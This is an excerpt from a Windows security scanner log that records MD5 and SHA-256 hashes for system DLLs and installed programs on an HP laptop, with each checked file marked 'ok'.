12:17:22.0344 0x1aa8 [ D029339C0F59CF662094EDDF8C42B2B5, 934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C ] C:\Windows\System32\msvcp100.dll
12:17:22.0344 0x1aa8 C:\Windows\System32\msvcp100.dll - ok
12:17:22.0348 0x1aa8 [ C9E9C068C87E9C8F3E41675EC21037BE, D962A36B6E81968F0FCF1C562EA82418215BFB608C6AA07D40205D6DB18D6F02 ] C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
12:17:22.0348 0x1aa8 C:\Program Files (x86)\Hightail Desktop App\Hightail.exe - ok
12:17:22.0351 0x1aa8 [ 366FD6F3A451351B5DF2D7C4ECF4C73A, AE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5 ] C:\Windows\System32\msvcr100.dll
12:17:22.0351 0x1aa8 C:\Windows\System32\msvcr100.dll - ok
12:17:22.0355 0x1aa8 [ E96C88DBF468780F887F680DE899B7D1, 4082365DD36099F225D0C3C9AA531A7741A81E1966F086454B4C7E13131165B1 ] C:\Windows\System32\igfxrenu.lrc
12:17:22.0355 0x1aa8 C:\Windows\System32\igfxrenu.lrc - ok
12:17:22.0358 0x1aa8 [ 19F9B524A525D202194247E96656CB88, 682EDB1A905C3D623AF18D633D5ADCBCE2AFC70AAFABD0508B64CC6FF5D29B82 ] C:\Windows\System32\mfc42u.dll
12:17:22.0358 0x1aa8 C:\Windows\System32\mfc42u.dll - ok
12:17:22.0361 0x1aa8 [ 53733AB7C92E524D2413A39433FF874F, BC36F2572C2D2A2136589116EB617D72FC40908D83F3C9B18FC4157165CCC104 ] C:\Program Files\CCleaner\CCleaner64.exe
12:17:22.0361 0x1aa8 C:\Program Files\CCleaner\CCleaner64.exe - ok
12:17:22.0365 0x1aa8 [ 105CFE016CCB20175BEACEC146F175AB, BA21F40CDBF159EE4EACCBFB2A7D20EB9E1C2758883AF089A8E53EE478002E83 ] C:\Windows\System32\IccLibDll_x64.dll
12:17:22.0365 0x1aa8 C:\Windows\System32\IccLibDll_x64.dll - ok
12:17:22.0369 0x1aa8 [ DF48408BD8A76BC35FCC8514A89B55A9, 332CAEA4F15C4F339FAD5248CD346552CB8728892DE8B3525A89BA19C0137967 ] C:\Windows\System32\SynCOM.dll
12:17:22.0369 0x1aa8 C:\Windows\System32\SynCOM.dll - ok
12:17:22.0372 0x1aa8 [ 9D4A0ECBF734E2EECDD5B473A2D705FE, F663B8EDA4C75DB6D3E3B68EE938FE43B0C05EF9B09598BFEB147D041D3F6A17 ] C:\Program Files (x86)\Skype\Phone\Skype.exe
12:17:22.0373 0x1aa8 C:\Program Files (x86)\Skype\Phone\Skype.exe - ok
12:17:22.0376 0x1aa8 [ 773D7DC2BABC0C3DEFE910C44637F573, D6DCE23D80DC229A423D3CA1F7F4BC1F1CC20B54D805CA984294B5DFF9457A53 ] C:\Windows\System32\SynTPAPI.dll
12:17:22.0376 0x1aa8 C:\Windows\System32\SynTPAPI.dll - ok
12:17:22.0379 0x1aa8 [ 7FF8E121AFA05BDAB23B9FEDCDAB7A33, CF92328CDB1BA1E7A3EC3AD4E1CB86B021D4483172DE0F1DB1E83E41F994B8BD ] C:\Windows\System32\odbc32.dll
12:17:22.0379 0x1aa8 C:\Windows\System32\odbc32.dll - ok
12:17:22.0381 0x1aa8 [ 1B6FD58BDE2C3A23F5CAD11802B8643D, AD4F1995876291993108604CBF57B8B955E8FC3839C197C880B98EEEA57F13FB ] C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
12:17:22.0382 0x1aa8 C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe - ok
12:17:22.0386 0x1aa8 [ 4C988ECE4DB6D5B262329B30E7962D91, 33706F9DA0F6AEEF7963121AA3A5FD7158609C29D68BB192C6E179C387620BC0 ] C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe
12:17:22.0386 0x1aa8 C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe - ok
12:17:22.0390 0x1aa8 [ E408A70119A08FD75BEB70C82C25C32A, 715DFFFA44BEF201CFC05C37893264A2102F1586BDA413C431861ACBF54588F6 ] C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar3.exe
12:17:22.0390 0x1aa8 C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar3.exe - ok
12:17:22.0394 0x1aa8 [ 4694A763F1B7EC8EA64472DC81446C85, 12F7176E29E3E6542DF0909C1766F42A7943D72F76C9FDE3134DFFF66F90B5D0 ] C:\Program Files\IDT\WDM\stlang64.dll
12:17:22.0394 0x1aa8 C:\Program Files\IDT\WDM\stlang64.dll - ok
12:17:22.0397 0x1aa8 [ CCCDC7B64CFF96C977B0FADC24434628, 4E9FE8A70848B103FD551E3A770EBA71DCE945D408856EDFDC3FA6F0E9EB89FF ] C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
12:17:22.0397 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe - ok
12:17:22.0402 0x1aa8 [ 17A6D025B3824044A737087BA0509BB8, F5AF8644334A45F0DCDCD46E756CB5558CA6B17025472FD84F584C75A3A4F23E ] C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
12:17:22.0402 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe - ok
12:17:22.0406 0x1aa8 [ 048EA4B978851788E9F5E8E4F081DF7A, EB62719AC0DCC18FF056F2CD84438BF14B61E38F0619617C81961C6257BDFCEC ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
12:17:22.0406 0x1aa8 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe - ok
12:17:22.0410 0x1aa8 [ 3E466073C3B1033FF92ADE9031E3D4A2, 2B26096A6BA2EE8C496D3252248F21D214E8C41ECF79A60A60E52D3BC4135C03 ] C:\Windows\System32\odbcint.dll
12:17:22.0410 0x1aa8 C:\Windows\System32\odbcint.dll - ok
12:17:22.0414 0x1aa8 [ 8A3B69683E63808719D24E1C68C21CC7, C27B2F3996B55619B45BDB332B0F3262A68CE7EEC78730C6D96B752D086C8B1D ] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
12:17:22.0414 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe - ok
12:17:22.0418 0x1aa8 [ 1B3F6E8A61A9F54DFF94E95D75319319, E6628D41B994070A6ADC1FEB4908A033A92796705CD67FE6A9CB755D1C14A581 ] C:\Program Files\WIDCOMM\Bluetooth Software\Btwapi.dll
12:17:22.0418 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\Btwapi.dll - ok
12:17:22.0422 0x1aa8 [ D1C8B0DC04347B6B9B5B3B9204DF6756, DA4D1CC98DCDFDF674F83164843A6B4E8830232700BE13CC755F94638351DA8B ] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
12:17:22.0422 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe - ok
12:17:22.0426 0x1aa8 [ BF38660A9125935658CFA3E53FDC7D65, 60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA ] C:\Windows\SysWOW64\msvcr100.dll
12:17:22.0426 0x1aa8 C:\Windows\SysWOW64\msvcr100.dll - ok
12:17:22.0430 0x1aa8 [ 6061114558D3D1CBE66F2EF2AF148966, 22B9A40CCE2C79D2DFA42B653CE02B7B2D78FAF15A0762A00B6B7D8BB6D4CF51 ] C:\Windows\winsxs\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_8448b2bd328df189\mfc80.dll
12:17:22.0430 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_8448b2bd328df189\mfc80.dll - ok
12:17:22.0435 0x1aa8 [ F14E2B91068C46ACC06BA950060A3012, 1D2C7A3F989C24B772FC4C2BBC3FD62C6C67BA70A7A10013E7EA0A420C8D1590 ] C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
12:17:22.0435 0x1aa8 C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe - ok
12:17:22.0439 0x1aa8 [ F572E51921A69EBE17E1DE89CB03DD5B, D8F9EC68CAA5CB15C8C270CC11E2C7106F5F0C19CA539836C2FED5D4CF6E0B58 ] C:\Program Files (x86)\Hewlett-Packard\Shared\hputils.dll
12:17:22.0439 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\Shared\hputils.dll - ok
12:17:22.0443 0x1aa8 [ B53DAB63590913597C2ABF7E861A2433, 98E3A6D40938B1CC7482172FEC2E7D01B2AB7F35017DBE8968D3D6FBE559C5BE ] C:\Program Files\WIDCOMM\Bluetooth Software\btosif.dll
12:17:22.0443 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btosif.dll - ok
12:17:22.0447 0x1aa8 [ 8192B2E274607D1D530F5C191698C544, E20D5803AFC7BF69906284CEA869F6C773A4E0D20067599F5E11D5EE248109F7 ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
12:17:22.0447 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe - ok
12:17:22.0452 0x1aa8 [ 0BC653FD505E4E7D402AC94CEEACFE5B, 10771FCF9FC6D4FA8658CDA16DC8F9FAA0B05232AAB223DF8152A1D846276249 ] C:\Program Files\WIDCOMM\Bluetooth Software\btwhidcs.dll
12:17:22.0452 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btwhidcs.dll - ok
12:17:22.0456 0x1aa8 [ B1FDCFFF7609E121C10751A669AB1611, 1181542D9CFD63FB00C76242567446513E6773EA37DB6211545629BA2ECF26A1 ] C:\Windows\winsxs\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_8448b2bd328df189\mfc80u.dll
12:17:22.0456 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_8448b2bd328df189\mfc80u.dll - ok
12:17:22.0460 0x1aa8 [ 11BE2933DA0600DE6A644C3A492675F4, 8E9EFFC569E244F96D62E449076A1A87F6B4BF8F3B72E051B980F7EE096E60FB ] C:\Windows\System32\irprops.cpl
12:17:22.0460 0x1aa8 C:\Windows\System32\irprops.cpl - ok
12:17:22.0464 0x1aa8 [ 5C832661F6AF6FBC7EDD5778294F6576, B96A4CBD37B2FE10845E7BF3875871C02AB44270475A5A7DE6FFB4E1AC058BF9 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
12:17:22.0465 0x1aa8 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe - ok
12:17:22.0469 0x1aa8 [ 9B7EDD3FE7C211C36E921D34D18A3A0A, 03A450F85A042F9668D1560FA2B8B89783568C87CDB1A8685CDA2AC9FE3761C3 ] C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
12:17:22.0469 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe - ok
12:17:22.0474 0x1aa8 [ A8704A10FFDE468F4AB18EBF82A9A86F, 40F6502679CEE0B657B0005278FBE7213BDDA6DEAACF868058E17737C182E1B4 ] C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcp80.dll
12:17:22.0474 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcp80.dll - ok
12:17:22.0478 0x1aa8 [ 5B6E8E09BE6401A7E022F52FDFCB2FF8, 471C556CF9405BBB380A8CEFE945C126B954B7C94F79CC72441B51F80141FC5E ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
12:17:22.0478 0x1aa8 C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe - ok
12:17:22.0482 0x1aa8 [ 8B3F50D4C68754ACC7953B9E07EE8275, 545AA896DE80F02FBD2B9FCA52B7879D2DC46CE95AD72E6718A0785343FE33E9 ] C:\Program Files (x86)\SMART BRO\UIExec.exe
12:17:22.0482 0x1aa8 C:\Program Files (x86)\SMART BRO\UIExec.exe - ok
12:17:22.0486 0x1aa8 [ 7F2D96D28D47ED3E0974B72580FE965F, FA318B8B1D700C5ABE8785870FF994296311B51B2F61F3C25442C4C70E02CBE0 ] C:\Program Files\Synaptics\SynTP\SynTPRes.dll
12:17:22.0486 0x1aa8 C:\Program Files\Synaptics\SynTP\SynTPRes.dll - ok
12:17:22.0490 0x1aa8 [ 214FFDD72622427B4E0DA0F541384717, 3FCA01D12B157790AD540D1167EC9BFDAC7DF82D970046193A9C46A7789BF323 ] C:\Program Files\WIDCOMM\Bluetooth Software\BtBalloon.dll
12:17:22.0490 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtBalloon.dll - ok
12:17:22.0493 0x1aa8 [ 442235AC4F20B195F932990CAE47408E, 811A03A5D7C03802676D2613D741BE690B3461022EA925EB6B2651A5BE740A4C ] C:\Windows\winsxs\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_bc20f59b0bdd1acd\mfc80ENU.dll
12:17:22.0494 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_bc20f59b0bdd1acd\mfc80ENU.dll - ok
12:17:22.0498 0x1aa8 [ D5D5EBEA45B5C0AA8650CC1FD807053C, 16A8831D7CF86CB47F9D3635C85838D1A3DC62422E34BCEEFF793522F6E063E8 ] C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll
12:17:22.0498 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll - ok
12:17:22.0502 0x1aa8 [ 6BA03B5AF0B49BFEFC5DF84C8DBE5209, C1C77823C4E97F70CCA10777C213A70E74FD372B74C96AA6D00D147A8B9656F4 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\reader_sl.exe
12:17:22.0502 0x1aa8 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\reader_sl.exe - ok
12:17:22.0506 0x1aa8 [ 49531A59899FB6C888D3AC76C908693D, F8E8D8214B703BF5F9BA0616C9D25D878ED99E17711291FF37CFF15D161EE1E1 ] C:\Windows\System32\usbui.dll
12:17:22.0506 0x1aa8 C:\Windows\System32\usbui.dll - ok
12:17:22.0510 0x1aa8 [ BD0EA5C8A4EF518C46E05F99908A56CE, 227196BAB2D7D14FB64284159B0EAFB4663C2F0ED3DF3DE96C8970749524CCFF ] C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
12:17:22.0510 0x1aa8 C:\Program Files\Synaptics\SynTP\SynTPHelper.exe - ok
12:17:22.0513 0x1aa8 [ 243974EC02F7AE49E4179C54624143AB, 755FA67F7BF10E3C6336788D297FBAA70F28F630852A43A78D3F7D7E3A7ECED0 ] C:\Windows\SysWOW64\MMDevAPI.dll
12:17:22.0513 0x1aa8 C:\Windows\SysWOW64\MMDevAPI.dll - ok
12:17:22.0517 0x1aa8 [ 13ECAC1C51CC00147BD06B5ABF142956, 77C3100B25BBEC25DD6737649307A70455FB96D487F70DC28CDCF12B13F8B940 ] C:\Program Files\CCleaner\CCleaner.exe
12:17:22.0517 0x1aa8 C:\Program Files\CCleaner\CCleaner.exe - ok
12:17:22.0522 0x1aa8 [ E948D1D42DC68923ABD75EEB5BCCD1D3, 74218AE72B6B9940315F17D297E97F9F5CE4962C956AF8049367E14769D6EDD5 ] C:\Windows\System32\consent.exe
12:17:22.0522 0x1aa8 C:\Windows\System32\consent.exe - ok
12:17:22.0525 0x1aa8 [ FC3001B4B9DF50B61F3CCA615759EFE7, 9AAE3665AD2893E7DB41965D430A7230B826AC4580603F20102E21C19C15535F ] C:\Windows\System32\PhotoMetadataHandler.dll
12:17:22.0525 0x1aa8 C:\Windows\System32\PhotoMetadataHandler.dll - ok
12:17:22.0529 0x1aa8 [ 5C3F9DBA818CD93379D1A0F215270374, 6A4D96AC83989D47D80332E41E627F2607A3B2167E1A5D8E21361136C4424633 ] C:\Windows\SysWOW64\esent.dll
12:17:22.0529 0x1aa8 C:\Windows\SysWOW64\esent.dll - ok
12:17:22.0532 0x1aa8 [ 4F6E72B34ED3DC53DCC5E8708E60B61F, CB79F4EBCE11ECCFA167498F329F95D545F8D4E5CCE4006B2A03B595733AEBC2 ] C:\Windows\SysWOW64\security.dll
12:17:22.0532 0x1aa8 C:\Windows\SysWOW64\security.dll - ok
12:17:22.0537 0x1aa8 [ D96106CF60505734B14F6AE80AAA4B07, 900B5186D665FBDCFB2F367C30013F07D16EE65EC959528D72E9C5339007CF2E ] C:\Windows\SysWOW64\d3d10warp.dll
12:17:22.0537 0x1aa8 C:\Windows\SysWOW64\d3d10warp.dll - ok
12:17:22.0540 0x1aa8 [ E601860AA04CE2198DBC6AC2AF80AFF7, B9D2BAEF2F6F8EA687414E73DFC5207F11A406D53C3444FCDAFD9CE1B4940053 ] C:\Windows\System32\perfos.dll
12:17:22.0540 0x1aa8 C:\Windows\System32\perfos.dll - ok
12:17:22.0543 0x1aa8 [ 85683DF1F917E4D7F6BE1A04986BF1C8, D68D9F525D31C1843B6EC8FA950166FA1F34DB71222716E7B22DD33981C152B6 ] C:\Windows\SysWOW64\msacm32.dll
12:17:22.0543 0x1aa8 C:\Windows\SysWOW64\msacm32.dll - ok
12:17:22.0547 0x1aa8 [ 63ED6DEDACEDAC71005A29428C1D4382, 134E111A3126934F39BD2145191AC06A0403F82E5BA56C74D27B3064BE0AD9B1 ] C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
12:17:22.0547 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll - ok
12:17:22.0551 0x1aa8 [ F3ECEA2EE71A1D2C0531166A99D90892, CAA69CC7E3D0D1DDE3541C7D289EAA793E45AA2CE2AC1A7D3E54D48FE64FBE1D ] C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe
12:17:22.0551 0x1aa8 C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe - ok
12:17:22.0555 0x1aa8 [ 139D3AB6AA920C34C50CBFFB9EB7D222, 5A5D205E16E6AFDCC965E4144FE6E104157DE7541D31727520363F2670513940 ] C:\Windows\SysWOW64\avrt.dll
12:17:22.0555 0x1aa8 C:\Windows\SysWOW64\avrt.dll - ok
12:17:22.0558 0x1aa8 [ 703FFD301AB900B047337C5D40FD6F96, C09909B89183B89BA87CAC8C5BEBD0E995C5CB08CC9B9D1E88352103EE958857 ] C:\Windows\SysWOW64\olepro32.dll
12:17:22.0559 0x1aa8 C:\Windows\SysWOW64\olepro32.dll - ok
12:17:22.0562 0x1aa8 [ DDF12820B96564693FC054637F33D73F, 863911E7E87371EBCE009C1B455AA54773A9DAB4FA2C545EBD9170A448350016 ] C:\Program Files\CCleaner\branding.dll
12:17:22.0562 0x1aa8 C:\Program Files\CCleaner\branding.dll - ok
12:17:22.0566 0x1aa8 [ 28CA821606669BB9215CE010767720FA, C8A1F0D6704F8F37CF8AADDFAD511FF27E56E8BCFFD4AC948DFA0329DB1F3A1E ] C:\Windows\SysWOW64\cryptui.dll
12:17:22.0566 0x1aa8 C:\Windows\SysWOW64\cryptui.dll - ok
12:17:22.0570 0x1aa8 [ 8BC9DB92C4B2F3BE89185BEAB2AFC1F6, 4F40D5CCE264290C8DD73A5766062A55ED4CF77D8F6B59D453DDB6F88B640D7E ] C:\Windows\SysWOW64\mapi32.dll
12:17:22.0570 0x1aa8 C:\Windows\SysWOW64\mapi32.dll - ok
12:17:22.0574 0x1aa8 [ FB0BCD1913964A5CC8C9F9FE167C34E7, 6A9F43E611B0C48112F34D3363CBFB5BA4DC4F0AF2758B260F822AB60C7594EB ] C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\xlicons.exe
12:17:22.0574 0x1aa8 C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\xlicons.exe - ok
12:17:22.0578 0x1aa8 [ C3761661C17C2248A9379A8FB89E3DE1, CE3477FA2B4058EB80739E0161FE957545F13CF86D313F6422732901D35F75F2 ] C:\Windows\System32\stobject.dll
12:17:22.0578 0x1aa8 C:\Windows\System32\stobject.dll - ok
12:17:22.0581 0x1aa8 [ F832EEEA97CDDA1AF577E721F652A0D1, EBBB7CA199BA4DF231123922BD310D43DE0104C6185B70FE0281B938D5336F2E ] C:\Windows\System32\batmeter.dll
12:17:22.0581 0x1aa8 C:\Windows\System32\batmeter.dll - ok
12:17:22.0585 0x1aa8 [ 752F8E96BAB993517838315508FB82CB, E2D40BC51CAA147EBCEB9898D3D75540CEF83376E088942D289CD58FFAE654DE ] C:\Windows\SysWOW64\perfproc.dll
12:17:22.0585 0x1aa8 C:\Windows\SysWOW64\perfproc.dll - ok
12:17:22.0589 0x1aa8 [ 2D2A6EC8EAD30EC3ACE2FD6FB1B3E122, E7EA375A3BDE8FC764CB09524344370B9EE25F98AD6C83E6F37A569EB8D277D6 ] C:\Windows\System32\prnfldr.dll
12:17:22.0589 0x1aa8 C:\Windows\System32\prnfldr.dll - ok
12:17:22.0592 0x1aa8 [ F1C19F0AA151B90A7416FA1D50DDB582, A4AE6B056BF65A12CE5BEDFC3ADE156F088AEAC7196EB5741C9573C64552A7C0 ] C:\Windows\System32\WindowsCodecsExt.dll
12:17:22.0593 0x1aa8 C:\Windows\System32\WindowsCodecsExt.dll - ok
12:17:22.0596 0x1aa8 [ 2A436796758BF2555A26C770FE8A6FEE, 9E42AF3A3CB05E323CBB7F93FE7C454CD251672C5D9F5E94909131A5D8F9204A ] C:\Windows\System32\fdProxy.dll
12:17:22.0596 0x1aa8 C:\Windows\System32\fdProxy.dll - ok
12:17:22.0599 0x1aa8 [ 42A9CB6906D9A8BEDC83B57163E62924, E18522D3137653140757829EFBFCE624A5BAA5842E2BBA10B9E5AB6C84BE49E1 ] C:\Windows\System32\DXP.dll
12:17:22.0599 0x1aa8 C:\Windows\System32\DXP.dll - ok
12:17:22.0602 0x1aa8 [ 2BC7C9FD0A9F2C9AFC373F3AD1EE3891, 0A82A475301202791A7C10F978F952EAB7DB146A702D4EA67E24E2C98BC19638 ] C:\Windows\System32\Syncreg.dll
12:17:22.0603 0x1aa8 C:\Windows\System32\Syncreg.dll - ok
12:17:22.0607 0x1aa8 [ C836175870E00ACC546066632E15BD10, 4347F3319C26DA1C38F395C74DBD67AF886149C8F29EDE765DD96C8480A3054A ] C:\Windows\ehome\ehSSO.dll
12:17:22.0607 0x1aa8 C:\Windows\ehome\ehSSO.dll - ok
12:17:22.0610 0x1aa8 [ A42F2C1EB3B66C54FB3C7B79D30C1A6D, A63836DB3B01835DC1311526A95198D6EBCCB1DC9DDAFBC38EC36C128CDB98B9 ] C:\Windows\System32\netshell.dll
12:17:22.0610 0x1aa8 C:\Windows\System32\netshell.dll - ok
12:17:22.0614 0x1aa8 [ 244C6722289F4869068992FD7D8A8832, 8644D0A55C46C3F081F0AB43D253D13E56E77D89336A87108DB8C47D6EDC3A64 ] C:\Windows\SysWOW64\wbem\wbemdisp.dll
12:17:22.0614 0x1aa8 C:\Windows\SysWOW64\wbem\wbemdisp.dll - ok
12:17:22.0618 0x1aa8 [ 5610B0425518D185331CB8E968D060E6, E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41 ] C:\Windows\SysWOW64\wbem\wmiutils.dll
12:17:22.0618 0x1aa8 C:\Windows\SysWOW64\wbem\wmiutils.dll - ok
12:17:22.0622 0x1aa8 [ 689EBD0C6D6D28FFCAA7A132F5F988AC, 3CAD0F1351B60468BC1178075DB7A0EA8C68126378D549DECB436EA84F8EF18A ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\WirelessOffMsg.exe
12:17:22.0622 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\WirelessOffMsg.exe - ok
12:17:22.0626 0x1aa8 [ 03E9314004F504A14A61C3D364B62F66, A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\msvcp100.dll
12:17:22.0626 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\msvcp100.dll - ok
12:17:22.0630 0x1aa8 [ E7368F0A8D19445EAF5C5D0DBB8B8DAB, CF9082360E32A7C3E13A67AC2C6192F4A76870D43DA9FF2936993A637F712761 ] C:\Windows\System32\AltTab.dll
12:17:22.0630 0x1aa8 C:\Windows\System32\AltTab.dll - ok
12:17:22.0632 0x1aa8 [ 4F3CD1C59EA71401E155C432BCECE180, 6D4118A627CAE509E43D0CC0062EECAA0990C955BB15AE24834460551B2F51A2 ] C:\Windows\System32\PortableDeviceTypes.dll
12:17:22.0632 0x1aa8 C:\Windows\System32\PortableDeviceTypes.dll - ok
12:17:22.0636 0x1aa8 [ C8FDF0FA9E97E2FAAF3F814716AAA881, DD24A1CAB44D943B0E1A795A347AD25D9305FC7F012A2566A6A14BD47221831F ] C:\Windows\System32\WPDShServiceObj.dll
12:17:22.0636 0x1aa8 C:\Windows\System32\WPDShServiceObj.dll - ok
12:17:22.0640 0x1aa8 [ 7CCE3233E653CEBD2F474170776B0B09, 4B402DD7E2F4679E47AFA965E9602312CAFD04426A6F7B6C074B3B982C979943 ] C:\Program Files\WIDCOMM\Bluetooth Software\BTNCopy.dll
12:17:22.0640 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BTNCopy.dll - ok
12:17:22.0643 0x1aa8 [ 10F815BE90A66AAFC6C713D1BD626064, 01139FC04BC53594296F6A0E16B8D20B940F64BC8119FE7705C03C4947958F39 ] C:\Windows\System32\pnidui.dll
12:17:22.0643 0x1aa8 C:\Windows\System32\pnidui.dll - ok
12:17:22.0647 0x1aa8 [ 6FA41E0C86EF049A12C05CA4BBA8F9AF, D18758C5A33B4C596EA6E87A16B53D7CF68EA9586C7F11C9518577BC8D7CBC9B ] C:\Windows\SysWOW64\perfos.dll
12:17:22.0647 0x1aa8 C:\Windows\SysWOW64\perfos.dll - ok
12:17:22.0650 0x1aa8 [ 1F27643C4C626457FCE8F047AE1CD7E1, 68E2367B9AA21C1BDE7FEA566D5F0DBDF1E246CB53E949622F8EDC810AA95956 ] C:\Windows\SysWOW64\dxva2.dll
12:17:22.0650 0x1aa8 C:\Windows\SysWOW64\dxva2.dll - ok
12:17:22.0653 0x1aa8 [ B9F0A4020AA98B7A20287BF7FE99A1FD, 21138F161EEEA46198890C7A2D073F2C82829E15676131BDAD9F237EDC7477CD ] C:\Windows\System32\QUTIL.DLL
12:17:22.0653 0x1aa8 C:\Windows\System32\QUTIL.DLL - ok
12:17:22.0657 0x1aa8 [ C2230964BA7DF049CAFA63B7AF635D55, D61BE566DA2B6D4F34F61A70788DEF7D418F5B68D8D5BC37A157E0B417AEB25C ] C:\Windows\SysWOW64\igdumdx32.dll
12:17:22.0657 0x1aa8 C:\Windows\SysWOW64\igdumdx32.dll - ok
12:17:22.0661 0x1aa8 [ 49EDFA350BCEA706681CC2B2C5FED51E, 49B69ECA34B7A949968B415DF1F2E1612976080AB941E0D3136F62A823B50523 ] C:\Windows\SysWOW64\igdumd32.dll
12:17:22.0661 0x1aa8 C:\Windows\SysWOW64\igdumd32.dll - ok
12:17:22.0665 0x1aa8 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] C:\Windows\System32\netman.dll
12:17:22.0665 0x1aa8 C:\Windows\System32\netman.dll - ok
12:17:22.0669 0x1aa8 [ 8569E35D00F45972E506502EEE622BA4, 01FE851C03DB88C8373099C279F995A559D962B08932E193032FA3EAD522FB01 ] C:\Windows\System32\srchadmin.dll
12:17:22.0669 0x1aa8 C:\Windows\System32\srchadmin.dll - ok
12:17:22.0673 0x1aa8 [ D2155709E336C3BC15729EB87FEC6064, 682A84C0F2D892E7A6CEE4E5937B4799E352AAE3B71E7037F2A343373467443C ] C:\Windows\System32\rasdlg.dll
12:17:22.0673 0x1aa8 C:\Windows\System32\rasdlg.dll - ok
12:17:22.0677 0x1aa8 [ F9AFD12BB4B1CFA5FCC0A5B37C604FD2, E8ACB693B1A78FAEF292111BE3F9B10BA95C76833C06C931A08EAAAE39A21334 ] C:\Windows\System32\dot3api.dll
12:17:22.0677 0x1aa8 C:\Windows\System32\dot3api.dll - ok
12:17:22.0680 0x1aa8 [ E4FCA0F99A41E460C84016DEFD31E6EF, 8EB14AF2025EADC7C86280E8417D8F286E8271B4F88B31696E33DFD72B3A0EF2 ] C:\Windows\System32\wlanhlp.dll
12:17:22.0680 0x1aa8 C:\Windows\System32\wlanhlp.dll - ok
12:17:22.0684 0x1aa8 [ F00AE7B953ABEF1B53FBBA187DFC8238, 6FFA160FB6821A725A7D81E1BECE1DE89E3E022B33E56A7468E2E0B4C8B2AE31 ] C:\Windows\System32\webcheck.dll
12:17:22.0684 0x1aa8 C:\Windows\System32\webcheck.dll - ok
12:17:22.0688 0x1aa8 [ 6699A112A3BDC9B52338512894EBA9D6, 10888BB9C3799E1E8B010C0F9088CED376AAD63A509FCE1727C457B022CDC717 ] C:\Program Files\Windows Media Player\wmpnscfg.exe
